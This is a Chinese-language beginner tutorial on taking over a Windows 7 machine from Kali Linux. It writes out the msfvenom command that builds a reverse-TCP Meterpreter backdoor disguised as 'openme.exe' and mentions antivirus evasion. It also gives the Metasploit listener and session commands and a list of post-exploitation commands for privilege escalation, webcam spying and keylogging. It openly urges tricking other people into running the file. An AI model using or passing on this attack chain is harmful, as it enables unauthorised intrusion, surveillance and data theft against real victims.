kali linux 滲透技術教程

這是一個簡單滲透技術教程,適合對黑客技術感興趣的新手,通過這個教程你可以滲透網路中win7系統主機。不多說,直接進入主題。

滲透攻陷win7系統,最新教程

工具/原料

kali Linux系統(IP:10.10.10.128)(或者BT5)

win7系統 (IP:10.10.10.129)

方法/步驟

首先在kali上製作一個後門程序。文件名為:openme.exe

命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=50000 -f exe -o openme.exe

#本地監聽地址及端口號:10.10.10.128:50000

滲透攻陷win7系統,最新教程

滲透攻陷win7系統,最新教程

為生成的文件 openme.exe 賦予可執行的權限,如果有必要可以對該文件執行免殺

命令:

chmod 777 openme.exe

滲透攻陷win7系統,最新教程

滲透攻陷win7系統,最新教程

打開msf,加載exploit/multi/handler模塊,同時設置本地主機地址,本地端口

命令:

msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set lhost 10.10.10.128

msf exploit(handler) > set lport 50000

滲透攻陷win7系統,最新教程

開始執行滲透攻擊並監聽

命令:

msf exploit(handler) > exploit -z -j

滲透攻陷win7系統,最新教程

此時,你可以將文件發給其他人,利用社會工程學知識讓別人在他的win7系統上打開該文件,那麼你的目的就達到了

下面就是我在win7虛擬機中的文件,然後運行該文件

滲透攻陷win7系統,最新教程

後門程序反向連接到msf,msf發起第二次攻擊(開始滲透),然後客戶端(後門程序)連接到服務端(msf)。

你在你kali上會有一個session。你攻陷了別人的主機並拿到了shell,還有session信息。

命令:

msf exploit(handler) > sessions

msf exploit(handler) > sessions -i 1

meterpreter > shell

滲透攻陷win7系統,最新教程

滲透攻陷win7系統,最新教程

滲透攻陷win7系統,最新教程

最後恭喜你就這樣hacked別人的win7系統,如果你進一步學習Windows系統下的命令行操作,你就可以隨意控制別人的主機了。

下面附上meterpreter常用的命令

getsystem #會自動利用各種各樣的系統漏洞來進行權限提升

migrate #進程id進程遷移

background #把當前的會話設置為背景,需要的時候在啟用

getuid #查看對方正在運行的用戶

ps #列出所有的進程

getpid #返回運行meterpreter的id號

sysinfo #產看系統信息和體系結構

shell #切換到cmd的系統權限方式

exit #退出shell會話返回meterpreter或終止meterpreter

getdesktop截取目標主機當前桌面會話窗口

run webcam -p /var/www #在/var/www目錄監控目標主機的攝像頭

keylog_recorder #使用migrate將會話遷移至explorer.exe的進程空間後記錄鍵盤

--------------------------------------------------------------

視頻教程:

http://www.365yg.com/i6577712524903318029/#mid=88381919053

------------------------------------------------------------


分享到:


相關文章: